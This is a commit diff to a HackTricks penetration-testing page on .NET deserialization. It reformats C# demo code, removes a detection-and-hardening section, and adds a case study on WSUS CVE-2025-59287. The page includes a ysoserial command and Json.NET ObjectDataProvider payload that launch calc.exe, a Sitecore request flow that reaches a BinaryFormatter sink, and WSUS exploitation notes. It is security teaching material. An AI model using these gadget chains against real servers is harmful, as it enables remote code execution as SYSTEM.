Merge pull request #1531 from HackTricks-wiki/update_Microsoft_WSUS_Remote_Code_Execution__CVE-2025-592_20251028_011817

carlospolop · web-flow · commit 295fc65fc693 · 2025-11-07T02:36:32.000+01:00
Microsoft WSUS Remote Code Execution (CVE-2025-59287) Active...
diff --git a/src/pentesting-web/deserialization/basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.md b/src/pentesting-web/deserialization/basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.md
@@ -34,7 +34,10 @@ Note that this isn't the complete code of the function `QueryWorker` but it show
 
 If you want to check that just setting the _**MethodName**_** it will be executed**, you can run this code:
 
-```java
+<details>
+<summary>C# demo: ObjectDataProvider triggers Process.Start</summary>
+
+```csharp
 using System.Windows.Data;
 using System.Diagnostics;
 
@@ -54,6 +57,8 @@ namespace ODPCustomSerialExample
 }
 ```
 
+</details>
+
 Note that you need to add as reference _C:\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\PresentationFramework.dll_ in order to load `System.Windows.Data`
 
 ## ExpandedWrapper
@@ -65,7 +70,10 @@ This is very useful for cases as the one presented before, because we will be ab
 
 You can check this wrapper with the following code:
 
-```java
+<details>
+<summary>C# demo: ExpandedWrapper encapsulating ObjectDataProvider</summary>
+
+```csharp
 using System.Windows.Data;
 using System.Diagnostics;
 using System.Data.Services.Internal;
@@ -87,6 +95,8 @@ namespace ODPCustomSerialExample
 }
 ```
 
+</details>
+
 ## Json.Net
 
 In the [official web page](https://www.newtonsoft.com/json) it is indicated that this library allows to **Serialize and deserialize any .NET object with Json.NET's powerful JSON serializer**. So, if we could **deserialize the ObjectDataProvider gadget**, we could cause a **RCE** just deserializing an object.
@@ -95,7 +105,10 @@ In the [official web page](https://www.newtonsoft.com/json) it is indicated that
 
 First of all lets see an example on how to **serialize/deserialize** an object using this library:
 
-```java
+<details>
+<summary>C# demo: Json.NET serialize/deserialize</summary>
+
+```csharp
 using System;
 using Newtonsoft.Json;
 using System.Diagnostics;
@@ -138,11 +151,13 @@ namespace DeserializationTests
 }
 ```
 
+</details>
+
 ### Abusing Json.Net
 
 Using [ysoserial.net](https://github.com/pwntester/ysoserial.net) I crated the exploit:
 
-```java
+```text
 yoserial.exe -g ObjectDataProvider -f Json.Net -c "calc.exe"
 {
     '$type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35',
@@ -157,7 +172,10 @@ yoserial.exe -g ObjectDataProvider -f Json.Net -c "calc.exe"
 
 In this code you can **test the exploit**, just run it and you will see that a calc is executed:
 
-```java
+<details>
+<summary>C# demo: Json.NET ObjectDataProvider exploitation PoC</summary>
+
+```csharp
 using System;
 using System.Text;
 using Newtonsoft.Json;
@@ -194,6 +212,8 @@ namespace DeserializationTests
 }
 ```
 
+</details>
+
 ## Advanced .NET Gadget Chains (YSoNet & ysoserial.net)
 
 The ObjectDataProvider + ExpandedWrapper technique introduced above is only one of MANY gadget chains that can be abused when an application performs **unsafe .NET deserialization**.  Modern red-team tooling such as **[YSoNet](https://github.com/irsdl/ysonet)** (and the older [ysoserial.net](https://github.com/pwntester/ysoserial.net)) automate the creation of **ready-to-use malicious object graphs** for dozens of gadgets and serialization formats.
@@ -230,22 +250,17 @@ msbuild ysonet.sln -p:Configuration=Release
 
 The compiled `ysonet.exe` can then be found under `ysonet/bin/Release/`.
 
-### Detection & Hardening
-* **Detect** unexpected child processes of `w3wp.exe`, `PowerShell.exe`, or any process deserialising user-supplied data (e.g. `MessagePack`, `Json.NET`).
-* Enable and **enforce type-filtering** (`TypeFilterLevel` = *Full*, custom `SurrogateSelector`, `SerializationBinder`, *etc.*) whenever the legacy `BinaryFormatter` / `NetDataContractSerializer` cannot be removed.
-* Where possible migrate to **`System.Text.Json`** or **`DataContractJsonSerializer`** with whitelist-based converters.
-* Block dangerous WPF assemblies (`PresentationFramework`, `System.Workflow.*`) from being loaded in web processes that should never need them.
-
 ## Real‑world sink: Sitecore convertToRuntimeHtml → BinaryFormatter
 
 A practical .NET sink reachable in authenticated Sitecore XP Content Editor flows:
 
 - Sink API: `Sitecore.Convert.Base64ToObject(string)` wraps `new BinaryFormatter().Deserialize(...)`.
 - Trigger path: pipeline `convertToRuntimeHtml` → `ConvertWebControls`, which searches for a sibling element with `id="{iframeId}_inner"` and reads a `value` attribute that is treated as base64‐encoded serialized data. The result is cast to string and inserted into the HTML.
 
-Minimal end‑to‑end (authenticated):
+<details>
+<summary>Authenticated Sitecore sink trigger HTTP flow</summary>
 
-```
+```text
 // Load HTML into EditHtml session
 POST /sitecore/shell/-/xaml/Sitecore.Shell.Applications.ContentEditor.Dialogs.EditHtml.aspx
 Content-Type: application/x-www-form-urlencoded
@@ -260,6 +275,8 @@ __PARAMETERS=edithtml:fix&...&ctl00$ctl00$ctl05$Html=
 GET /sitecore/shell/-/xaml/Sitecore.Shell.Applications.ContentEditor.Dialogs.FixHtml.aspx?hdl=...
 ```
 
+</details>
+
 - Gadget: any BinaryFormatter chain returning a string (side‑effects run during deserialization). See YSoNet/ysoserial.net to generate payloads.
 
 For a full chain that starts pre‑auth with HTML cache poisoning in Sitecore and leads to this sink:
@@ -268,10 +285,29 @@ For a full chain that starts pre‑auth with HTML cache poisoning in Sitecore an
 ../../network-services-pentesting/pentesting-web/sitecore/README.md
 {{#endref}}
 
+## Case study: WSUS unsafe .NET deserialization (CVE-2025-59287)
+
+- Product/role: Windows Server Update Services (WSUS) role on Windows Server 2012 → 2025.
+- Attack surface: IIS-hosted WSUS endpoints over HTTP/HTTPS on TCP 8530/8531 (often exposed internally; Internet exposure is high risk).
+- Root cause: Unauthenticated deserialization of attacker-controlled data using legacy formatters:
+  - `GetCookie()` endpoint deserializes an `AuthorizationCookie` with `BinaryFormatter`.
+  - `ReportingWebService` performs unsafe deserialization via `SoapFormatter`.
+- Impact: A crafted serialized object triggers a gadget chain during deserialization, leading to arbitrary code execution as `NT AUTHORITY\SYSTEM` under either the WSUS service (`wsusservice.exe`) or the IIS app pool `wsuspool` (`w3wp.exe`).
+
+Practical exploitation notes
+- Discovery: Scan for WSUS on TCP 8530/8531. Treat any pre-auth serialized blob reaching WSUS web methods as a potential sink for `BinaryFormatter`/`SoapFormatter` payloads.
+- Payloads: Use YSoNet/ysoserial.net to generate `BinaryFormatter` or `SoapFormatter` chains (e.g., `TypeConfuseDelegate`, `ActivitySurrogateSelector`, `ObjectDataProvider`).
+- Expected process lineage on success:
+  - `wsusservice.exe -> cmd.exe -> cmd.exe -> powershell.exe`
+  - `w3wp.exe (wsuspool) -> cmd.exe -> cmd.exe -> powershell.exe`
+
 ## References
 - [YSoNet – .NET Deserialization Payload Generator](https://github.com/irsdl/ysonet)
 - [ysoserial.net – original PoC tool](https://github.com/pwntester/ysoserial.net)
 - [Microsoft – CVE-2017-8565](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2017-8565)
 - [watchTowr Labs – Sitecore XP cache poisoning → RCE](https://labs.watchtowr.com/cache-me-if-you-can-sitecore-experience-platform-cache-poisoning-to-rce/)
+- [Unit 42 – Microsoft WSUS RCE (CVE-2025-59287) actively exploited](https://unit42.paloaltonetworks.com/microsoft-cve-2025-59287/)
+- [MSRC – CVE-2025-59287 advisory](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59287)
+- [NVD – CVE-2025-59287](https://nvd.nist.gov/vuln/detail/CVE-2025-59287)
 
-{{#include ../../banners/hacktricks-training.md}}
+{{#include ../../banners/hacktricks-training.md}}
